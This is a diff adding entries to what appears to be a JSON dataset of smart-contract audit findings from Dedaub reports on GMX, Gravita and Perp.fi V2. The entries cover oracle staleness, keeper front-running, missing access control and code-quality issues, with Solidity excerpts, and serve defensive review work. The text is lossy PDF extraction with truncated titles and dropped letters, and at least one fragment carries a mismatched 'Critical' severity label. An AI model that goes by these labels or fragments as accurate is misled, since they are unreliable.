receiver. function _transferOutEth(address token, uint256 amount, address receiver) internal { require(receiver != address(this), \"Bank: invalid receiver\"); IWETH(token).withdraw(amount); payable(receiver).transfer(amount); _afterTransferOut(token); } WIthout a receive function any transaction with shouldConvertETH = true would fail. 1", + "labels": [ + "Dedaub", + "GMX", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "lower bounds for swaps and positions OPEN Since there are no lower bounds for the size of a position, someone could in principle create a large number of tiny orders. Such a strategy would cost the adversary only the gas fees and the total amount of the requested positions, which can be as small as he wishes. In this 2-step procedure used in this version of the protocol, such a behavior could potentially create a problem, because the order keepers would have to execute a huge number of orders. We suggest seing a minimum size for positions and swaps. L3 Inconsistency in calculating liquidations OPEN The comment in PositionUtils::isPositionLiquidatable indicates that price impact is not used when computing whether a position is liquidatable. However, the price impact is in fact used in the code: // price impact is not factored into the liquidation calculation // if the user is able to close the position gradually, the impact // may not be as much as closing the position in one transaction function isPositionLiquidatable( DataStore dataStore, Position.Props memory position, Market.Props memory market, MarketUtils.MarketPrices memory prices ) internal view returns (bool) { ... int256 priceImpactUsd = PositionPricingUtils.getPriceImpactUsd(...) int256 remainingCollateralUsd = collateralUsd.toInt256() + positionPnlUsd + priceImpactUsd + fees.totalNetCostAmount; 1 On the other hand, when the liquidation is executed, the price impact is not used. The comment in DecreasePositionUtils::processCollateral indicates that this is intentional: // the outputAmount does not factor in price impact // for example, if the market is ETH / USD and if a user uses USDC to long ETH // if the position is closed in profit or loss, USDC would be sent out from or // added to the pool without a price impact // this may unbalance the pool and the user could earn the positive price impact // through a subsequent action to rebalance the pool // price impact can be factored in if this is not desirable If this inconsistency is intentional, it should be properly documented in the comments. Note that, when deciding on a liquidation strategy, you should have in mind the possibility of cascading liquidations, namely the possibility that executing a liquidation causes other positions to become liquidatable. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) 1 ", + "labels": [ + "Dedaub", + "GMX", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "keepers can cause DoS in all operations OPEN Due to the two step execution system, any operation requires an order keeper to execute it. Trust is needed in that order keepers will timely execute all pending orders. If the order keeper does not submit execution transactions, all operations will cease to function, including closing positions and withdrawing funds. It would be benecial to implement fallback mechanisms that guarantee that users can at least withdraw their funds in case order keepers cease to function for any reason. For instance, the protocol could allow users to execute orders by providing oracle prices themselves, but only if an order is stale (a certain time has passed since its creation). N2 Order keepers can frontrun/reorder transactions There is nothing in the current system that prevents an order keeper from front-running or reordering transactions, for instance to exploit changes in the price impact. The protocol could include mechanisms that limit this possibility: for instance, the order keeper could be forced to execute orders in the same order they were created. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "erroneous computation of price impact ", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": " INFO 1 imbalance) ^ (price impact exponent) * (price impact factor) - (next Price impact is calculated as (initial imbalance) ^ (price impact exponent) * (price impact factor) The values of exponent (e) and impact factor (f) are set by the protocol for each market. If the impact factor is simply a percentage, then the price impact will have units USD^(price impact exponent). But this seems erroneous, since price impact is treated as a USD amount which is nally added to the amount requested by the user. A problem arises in case that these two quantities are selected independently of each other but also of the pool's deposits and status. For example, consider a pool with tokens A and B of total USD value x and y respectively. Consider that x < y. Then the imbalance equals d = y - x. If a user swaps A tokens of worth d/2, then prior to the price impact he will get B tokens of the same value. The new deposits of the pool will now be x'=y'=(x+y)/2 and the pool will become balanced. The price impact for this transaction is f*d^e, which could be ( if the parameters are not chosen carefully) larger than d/2, which is the requested swap amount. Also, this fact could lead to a pool which is even more imbalanced than the previous state. We suggest that (total_deposits)^(e-1)*f always be less than 1 to avoid the above mentioned undesirable behavior.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "in the submission time of dierent tokens INFO Price keepers are responsible for submiing prices for most of the protocol's tokens. The submied price should be the price retrieved from exchange markets at the time of each order's creation (the median of all these prices is nally used). However, for some tokens Chainlink oracles are used. In this case, the price at the time of the order execution is used.", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "user can liquidate its own position INFO there is nothing preventing a user ExchangeRouter::createLiquidation can be called only by liquidation keepers. However, from calling createOrder with orderType=Liquidation, eectively creating a liquidation order for their own position. Although this is not necessarily an issue, it is unclear whether this functionality is intentional or not. 1", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GMX/GMX Audit - Oct '22.pdf", + "body": "price impacts on large markets INFO The price impact calculation is a function with an exponential factor of the absolute dierences between open long and short interests before and after a trade. This works well for the average market, but on a large market with large open interests, it is not more eicient to open large positions. Consider that in other AMM designs, it is possible to open large positions with minimal price impact if the market is large (e.g., Uniswap ETH-USDC). A5 Known compiler bugs INFO The code can be compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, but a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts. 1", + "labels": [ + "Dedaub", + "GMX", + "Severity: Informational" + ] + }, + { + "title": "does not check if it is overwriting a previous queued oracle ", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": " RESOLVED (not applicable as of e4fbfc30) In PriceFeed::addOracle, the queuedOracles entry for the token is wrien without checking whether it is zero. This is only a problem in case the controller makes a mistake, but the presence of a deleteQueuedOracle function suggests that the right behavior for a controller would be to delete a queued oracle if its no longer valid. function addOracle(address _token, address _chainlinkOracle, bool _isEthIndexed) external override isController { AggregatorV3Interface newOracle = AggregatorV3Interface(_chainlinkOracle); _validateFeedResponse(newOracle); if (registeredOracles[_token].exists) { uint256 timelockRelease = block.timestamp.add(_getOracleUpdateTimelock()); queuedOracles[_token] = OracleRecord(newOracle, timelockRelease, true, true, _isEthIndexed); } else { registeredOracles[_token] = OracleRecord(newOracle, block.timestamp, true, emit NewOracleRegistered(_token, _chainlinkOracle, _isEthIndexed); true, _isEthIndexed); } } function deleteQueuedOracle(address _token) external override isController { delete queuedOracles[_token]; }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "timelock for adding oracles can be circumvented by deleting the previous oracle RESOLVED (not applicable as of e4fbfc30) On the same code as issue L1, in the PriceFeed contract, the controller can always subvert the above timelock by just deleting the registered oracle. function deleteOracle(address _token) external override isController { delete registeredOracles[_token]; } Thus, the timelock can only prevent accidents in the controller, and not provide assurances of having a delay for review of changes to oracles.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "series of liquidations can cause the zeroing of totalStakes ACKNOWLEDGED The stake of a Vessel holding _asset as collateral is computed by the formula in VesselManager::_computeNewStake : stake = _coll.mul(totalStakesSnapshot[_asset]).div(totalCollateralSnapshot[_asset]); The stake is updated when the Vessel is adjusted and _coll is the new collateral amount of the Vessel and totalStakesSnapshot, totalCollateralSnapshot the total stakes and total collateral respectively right after the last liquidation. A liquidation followed by a redistribution of the debt and collateral to the other Vessels decreases the total stakes (the stake of the liquidated Vessel is just deleted and not shared among the others) and the total collateral (if we ignore the fees) does not change. Therefore the ratio in the above formula is constantly decreasing after each liquidation followed by redistribution and each new Vessel will get a relatively smaller stake. The nite precision of the arithmetic operations can lead to a zeroing of totalStakes, if a series of liquidations of Vessels with high stakes occurs. If this happens, the total stakes will be zero forever and each new vessel will be assigned a zero stake. If this happens many functionalities of the protocol are blocked i.e. the VesselManager::redistributeDebtAndCollateral will revert every time, since the debt and collateral to distribute are computed dividing by the (zero) totalStakes. The probability of such a problem is higher in Gravita, compared to Liquity, because Gravita allows multiple collateral assets, some of them, in principle, more volatile compared to ETH.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "could return arbitrarily stale prices, if Chainlink Oracles response is not valid RESOLVED (e4fbfc30) The protocol uses the PriceFeed::fetchPrice to get the price of a _token, whenever it needs to. This function rst calls the Chainlink oracle to get the price for this _token and then checks the validity of the response. If it is valid, it stores the answer in lastGoodPrice[_token] and also returns it to the caller. If the Chainlink response is not valid, then the function returns the value stored in lastGoodPrice[_token]. The problem is that this value could have been stored a long time ago and there is no check about this in the contract. As an edge case, if the Chainlink oracle does not give a valid answer, upon its rst call for a _token, then the PriceFeed::fetchPrice function will return a zero price. Liquity uses a secondary oracle, if the response of Chainlink is not valid, and only if both oracles fail, the stored last good price is being used, but in Gravita there is no secondary oracle. L5 AdminContract::sanitizeParameters has no access control RESOLVED (58a41195) The function sets important collateral data (to default values) yet has no access control, unlike, e.g., the almost-equivalent setAsDefault, which is onlyOwner. 1 Although there are many other safeguards that ensure that collateral is valid, we recommend tightening the access control for sanitizeParameters as well. function sanitizeParameters(address _collateral) external { if (!collateralParams[_collateral].hasCollateralConfigured) { _setAsDefault(_collateral); } } function setAsDefault(address _collateral) external onlyOwner { _setAsDefault(_collateral); } CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "contracts can mint arbitrarily large amounts of debt tokens ", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": " INFO (acknowledged) The role of the whitelisted contracts is not completely clear to us. There is only one related comment in DebtToken.sol : // stores SC addresses that are allowed to mint/burn the token (AMO strategies,", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "mapping(address => bool) public whitelistedContracts; 1 These contracts can mint debt tokens without depositing any collateral calling DebtToken::mintFromWhitelistedContract. This could be a serious problem if such a contract was malicious. Also, even if these contracts work as expected, minting debt tokens without providing any collateral could have a serious impact on the price of the debt token. N2 Protocol owners can set crucial parameters INFO (acknowledged) Key functionality is trusted to the owner of various contracts. Owners can set the kinds of collateral accepted, the oracles that are used to price collateral, etc. Thus, protocol owners should be trusted by users. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Low" + ] + }, + { + "title": "struct Vessel (IVesselManager.sol), asset is unnecessary ", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": " INFO Field asset of struct Vessel is currently unused. Vessel records are currently only used in a mapping that has the asset as the key, so there is no need to read the asset from the Vessel data. In FeeCollector::_decreaseDebt no need to check for", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "fees if the expiration time of the refunding is block.timestamp INFO 1 In the code below if (mRecord.to < NOW) { } _closeExpiredOrLiquidatedFeeRecord(_borrower, _asset, mRecord.amount); < can be replaced by <=, since when mRecord == NOW, there is nothing left for the user to refund.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "event INFO The following event is declared in IAdminContract.sol but not used anywhere: event MaxBorrowingFeeChanged(uint256 oldMaxBorrowingFee, uint256 newMaxBorrowingFee);", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "storage variables INFO The storage mapping StabilityPool::pendingCollGains and code accessing it are unnecessary since the information is never set to non-zero values. // Mapping from user address => pending collaterals to claim still // Must always be sorted by whitelist to keep leftSumColls functionality mapping(address => Colls) pendingCollGains; ... function getDepositorGains(address _depositor) public view returns (address[] memory, uint256[] memory) { // Add pending gains to the current gains return ( collateralsFromNewGains, _leftSumColls( Colls(collateralsFromNewGains, amountsFromNewGains), pendingCollGains[_depositor].tokens, pendingCollGains[_depositor].amounts ) ); } ... function _sendGainsToDepositor( 1 address _to, address[] memory assets, uint256[] memory amounts ) internal { ... // Reset pendingCollGains since those were all sent to the borrower Colls memory tempPendingCollGains; pendingCollGains[_to] = tempPendingCollGains; } Also, StabilityPool::controller is unused and never set: IAdminContract public controller; Finally, variables activePool, defaultPool in GravitaBase seem unused and not set (at least for most subcontracts of GravitaBase). IActivePool public activePool; IDefaultPool internal defaultPool;", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "is really just a transfer INFO In StabilityPool::_sendGainsToDepositor, it is not clear why the transferFrom is not merely a transfer. function _sendGainsToDepositor( address _to, address[] memory assets, uint256[] memory amounts ) internal { for (uint256 i = 0; i < assetsLen; ++i) { IERC20Upgradeable(asset).safeTransferFrom(address(this), _to, amount); } } 1", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "with more than 18 decimals are not supported INFO Tokens with more than 18 decimals are not supported, based on the SafetyTransfer library (outside the audit scope). function decimalsCorrection(address _token, uint256 _amount) internal view returns (uint256) if (_token == address(0)) return _amount; if (_amount == 0) return 0; uint8 decimals = ERC20Decimals(_token).decimals(); if (decimals < 18) { return _amount.div(10**(18 - decimals)); } return _amount; // Dedaub: more than 18 not supported correctly! { } We do not recommend trying to address this, as it may introduce other complexities for very lile practical benet. Instead, we recommend just being aware of the limitation.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "statement (consisting of a mere expression) INFO In BorrowingOperations::openVessel, the following expression (used as a statement!) is a no-op: vars.debtTokenFee;", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "external function, not called as expected INFO 1 BorrowerOperations::moveLiquidatedAssetToVessel appears to not be used in the protocol. // Send collateral to a vessel. Called by only the Stability Pool. function moveLiquidatedAssetToVessel( address _asset, uint256 _amountMoved, address _borrower, address _upperHint, address _lowerHint ) external override { _requireCallerIsStabilityPool(); _adjustVessel(_asset, _amountMoved, _borrower, 0, 0, false, _upperHint, _lowerHint); }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "isInitialized flags INFO The following paern over storage variable isInitialized appears in several contracts but should be entirely unnecessary, due to the presence of the initializer modier. bool public isInitialized; function setAddresses(...) external initializer { require(!isInitialized); isInitialized = true; } Contracts with the paern include FeeCollector, PriceFeed, ActivePool, CollSurplusPool, DefaultPool, SortedVessels, StabilityPool, VesselManager, VesselManagerOperations, CommunityIssuance, GRVTStaking.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "INFO 1 The codebase exhibits some old code paerns (which we do not recommend xing, since they directly mimick the Liquity trusted code): The use of assert for condition checking (instead of require/ifrevert). (Some of the asserts have been replaced, but not all.) The use of SafeMath instead of relying on Solidity 0.8.* checks.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "and error-prone use of this.* INFO Some same-contract function calls are made with the paern this.func(), which causes a new internal transaction and changes the msg.sender. This should be avoided for clarity and (gas) performance. In VesselManager: function isVesselActive(address _asset, address _borrower) public view override returns (bool) { return this.getVesselStatus(_asset, _borrower) == uint256(Status.active); } In PriceFeed (and also note the unusual convention of 0 = ETH): function _calcEthPrice(uint256 ethAmount) internal returns (uint256) { uint256 ethPrice = this.fetchPrice(address(0)); // Dedaub: Also, why the convention that 0 = ETH? return ethPrice.mul(ethAmount).div(1 ether); } function _fetchNativeWstETHPrice() internal returns (uint256 price) { uint256 wstEthToStEthValue = _getWstETH_StETHValue(); OracleRecord storage stEth_UsdOracle = registeredOracles[stethToken]; price = stEth_UsdOracle.exists ? this.fetchPrice(stethToken) : _calcEthPrice(wstEthToStEthValue); _storePrice(wstethToken, price); } 1 Compatibility of PriceFeed::_fetchPrevFeedResponse,", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "with future versions of the Chainlink INFO Aggregator The roundId returned by the Chainlink AggregatorProxy contract is a uint80.The 16 most important bits keep the phaseId (incremented every time the underlying aggregator is updated) and the other 64 bits keep the roundId of the aggregator. As long as the underlying aggregator is the same, the roundId returned by the proxy will increase by one in each new round, but in an update of the aggregator contract the proxy roundId will increment not by 1, since the phaseId will also change. In this case the previous round is not current_roundId-1 and _fetchPrevFeedResponse will not return the price data from the previous round (which was a round of the previous aggregator). We mention this issue, although the probability that the protocol fetches a price at the time of an update of a Chainlink oracle is relatively small and each round lasts a few minutes to an hour. PriceFeed::_isValidResponse does all the validity checks necessary for the current Chainlink Aggregator version. Chaninlinks AggregatorProxy::latestRoundData returns also two extra values uint256 startedAt, uint80 answeredInRound, which, for the current version, do not hold extra information i.e. answeredInRound==roundId, but in past and possible future versions they could be used for some extra validity checks i.e. answeredInRound>=roundId.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "code In BorrowerOperations: function _requireNonZeroAdjustment( uint256 _collWithdrawal, uint256 _debtTokenChange, uint256 _assetSent ) internal view { require( INFO msg.value != 0 || _collWithdrawal != 0 || _debtTokenChange != 0 || 1 _assetSent != 0, \"BorrowerOps: There must be either a collateral change or a debt // Dedaub: `msg.value != 0` not possible change\" ); } the condition msg.value != 0 is not possible, as ensured in the single place where this function is called (_adjustVessel). The condition should be kept if the function is to be usable elsewhere in the future. Similarly, in VesselManager, the condition marked with a comment below seems unnecessary, given that the arithmetic is compiler-checked. function decreaseVesselDebt( address _asset, address _borrower, uint256 _debtDecrease ) external override onlyBorrowerOperations returns (uint256) { uint256 oldDebt = Vessels[_borrower][_asset].debt; if (_debtDecrease == 0) { return oldDebt; // no changes } uint256 paybackFraction = (_debtDecrease * 1 ether) / oldDebt; uint256 newDebt = oldDebt - _debtDecrease; Vessels[_borrower][_asset].debt = newDebt; if (paybackFraction > 0) { if (paybackFraction > 1 ether) { // Dedaub:Impossible. The \"-\" would have reverted, three lines above paybackFraction = 1 ether; } feeCollector.decreaseDebt(_borrower, _asset, paybackFraction); } return newDebt; } 1", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "ownable policy INFO Some contracts are dened to be Ownable (using the OZ libraries), yet do not use this capability (beyond initialization). These include: StabilityPool initializes Ownable, relinquishes ownership, but never checks ownership in setAddresses, or elsewhere. function setAddresses( address _borrowerOperationsAddress, address _vesselManagerAddress, address _activePoolAddress, address _debtTokenAddress, address _sortedVesselsAddress, address _communityIssuanceAddress, address _adminContractAddress ) external initializer override { __Ownable_init(); renounceOwnership(); // Dedaub: The function was onlyOwner in Liquity, here there's // no point of Ownable } VesselManagerOperations inherits and initializes ownable functionality but is it used? function setAddresses( address _vesselManagerAddress, address _sortedVesselsAddress, address _stabilityPoolAddress, address _collSurplusPoolAddress, address _debtTokenAddress, address _adminContractAddress ) external initializer { __Ownable_init(); // YS:! why? 2 }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "explicit check in BorrowerOperations::openVessel that the collateral deposited by the user is approved INFO If a user aempts to open a Vessel with a collateral asset not approved by the owner, the transaction will fail, because there will be no price oracle registered for this asset. Therefore it is checked if the user deposits an approved collateral asset, but only indirectly. It would be beer if there was an explicit check.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "only partially initializes the collateralParams structure INFO We cannot nd a specic problem with the current only partial initialization, since even if the owner just adds a new _collateral and does not set all the elds of collateralParams[_collateral], upon opening a Vessel the protocol sets the default values for these. But, in general it is not a good practice to leave uninitialized variables and it would be beer if in addnewCollateral the owner also set the default values for the remaining collateralParams elements.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "internal functions INFO In StabilityPool, the following two functions are unused. function _requireUserHasVessel(address _depositor) internal view { address[] memory assets = adminContract.getValidCollateral(); uint256 assetsLen = assets.length; for (uint256 i; i < assetsLen; ++i) { if (vesselManager.getVesselStatus(assets[i], _depositor) == 1) { return; } } revert(\"StabilityPool: caller must have an active vessel to withdraw AssetGain to\"); 2 } function _requireUserHasAssetGain(address _depositor) internal view { (address[] memory assets, uint256[] memory amounts) = getDepositorGains(_depositor); for (uint256 i = 0; i < assets.length; ++i) { if (amounts[i] > 0) { return; } } revert(\"StabilityPool: caller must have non-zero gains\"); }", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "mistakes in names or comments INFO This issue collects several items, all supercial, but easy to x. AdminContract: uint256 public constant PERCENT_DIVISOR_DEFAULT = 100; // dividing by 100 yields 0.5% // Dedaub: No, it yields 1% AdminContract: function setAsDefaultWithRemptionBlock( // Dedaub: spelling AdminContract: struct CollateralParams { } uint256 redemptionBlock; // Dedaub: misnamed, its in seconds (We advise special caution, since the eld is set in two ways, so external callers may be confused by the name and pass a block number, whereas the calculation is in terms of seconds.) StabilityPool: 2 // Internal function, used to calculcate ... PriceFeed: * - If price decreased, the percentage deviation is in relation to the the FeeCollector: function _createFeeRecord( address _borrower, address _asset, uint256 _feeAmount, FeeRecord storage _sRecord ) internal { uint256 from = block.timestamp + MIN_FEE_DAYS * 24 * 60 * 60; // Dedaub: `1 days` is the best way to write this, as done // elsewhere in the code", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "for gas optimization INFO Gas savings were not a focus of the audit, but there are some clear instances of repeat work or missed opportunities for immutable elds. StabilityPool: function receivedERC20(address _asset, uint256 _amount) external override { } totalColl.amounts[collateralIndex] += _amount; uint256 newAssetBalance = totalColl.amounts[collateralIndex]; The two highlighted lines (likely) perform two SLOADs and one SSTORE. Using an intermediate temporary variable for the sum will save an SLOAD. DebtToken: the following variable is only set in constructor, could be declared immutable. address public timelockAddress; 2", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "constants INFO Our recommendation is for all numeric constants to be given a symbolic name at the top of the contract, instead of being interspersed in the code. VesselManagerOperations::getRedemptionHints: collLot = collLot * REDEMPTION_SOFTENING_PARAM / 1000; AdminContract::setAsDefaultWithRedemptionBlock: if (blockInDays > 14) { ... BorrowerOperations::openVessel: contractsCache.vesselManager.setVesselStatus(vars.asset, msg.sender, 1); // Dedaub: 1 stands for \"active, but is obscure", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "inconsistent INFO Contract IDebtToken is not really an interface, since it contains full ER", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "functionality.", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", + "body": "allowed deviation between two consecutive oracle prices seems to be too high INFO In PriceFeed.sol there is a MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND constant set to 5e17 i.e. 50%. If the percentage deviation of two consecutive Chainlink responses is greater than this constant, the protocol rejects the new price as invalid. But the value of this constant seems to be too high. Moreover, we think it would be beer if the protocol used a dierent MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND for each collateral asset considering also the volatility of the asset. A23 Compiler bugs INFO 2 The code has the compile pragma ^0.8.10. For deployment, we recommend no floating pragmas, i.e., a xed version, for predictability. Solc version 0.8.10, specically, has some known bugs, which we do not believe to aect the correctness of the contracts. 2", + "labels": [ + "Dedaub", + "Gravita", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", + "body": "allows any msg.sender to send Ether RESOLVED ETH deposited into the Vault contract is converted to WETH by being deposited into the WETH contract. A user wishing to withdraw their ETH needs to call the withdrawEther method, which in turn calls the withdraw method of the WETH contract. As part of the unwrapping procedure of WETH, ETH is sent back to the Vault contract, which needs to be able to receive it and thus denes the special receive() method. It is expected (mentioned in a comment) that the receive() method will only be used to receive funds sent by the WETH contract. However, there is no check enforcing this assumption, allowing practically anyone to send ETH to the contract. We believe that the current version of the code is not susceptible to any aacks that could try to manipulate the accounting of ETH performed by the Vault. Still, we cannot guarantee that no aack vectors will arise as the codebase evolves and thus suggest adding a check on the msg.sender as follows: receive() external payable { require(_msgSender() == _WETH9, \"msg.sender is not WETH\"); } 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", + "body": "allows 0 value withdrawals ACKNOWLEDGED The Vault contract allows 0 value withdrawals through its external withdraw and withdrawEther methods. We believe that adding a requirement that a withdrawals amount should be greater than 0 would improve user experience and prevent the unnecessary spending of gas on user error. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.]", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", + "body": "allows 0 value liquidations ACKNOWLEDGED The Vault contract allows 0 value liquidations through its liquidateCollateral method. Disallowing such liquidations will protect users from unnecessarily spending gas in case they make a mistake. [The suggestion has been acknowledged by the protocol's team and might be implemented in a future release.]", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", + "body": "gas optimization RESOLVED Internal method Vault::_modifyBalance allows the mount parameter to be 0. This behavior is intended, as it is clearly documented in a comment. Nevertheless, when amount is 0, no changes are applied to the contract's state, as can be seen below: function _modifyBalance( address trader, address token, int256 amount ) internal { 0 // Dedaub: code has no effects on storage, still consumes some gas int256 oldBalance = _balance[trader][token]; int256 newBalance = oldBalance.add(amount); _balance[trader][token] = newBalance; if (token == _settlementToken) { return; } // register/deregister non-settlement collateral tokens if (oldBalance != 0 && newBalance == 0) { // Dedaub: execution will not reach here when amount is 0 // .. } else if (oldBalance == 0 && newBalance != 0) { // Dedaub: execution will not reach here when amount is 0 // .. } } oldBalance and newBalance are equal when amount is 0, thus no state changes get applied. Still some gas is consumed, which can be avoided if the method is changed to return 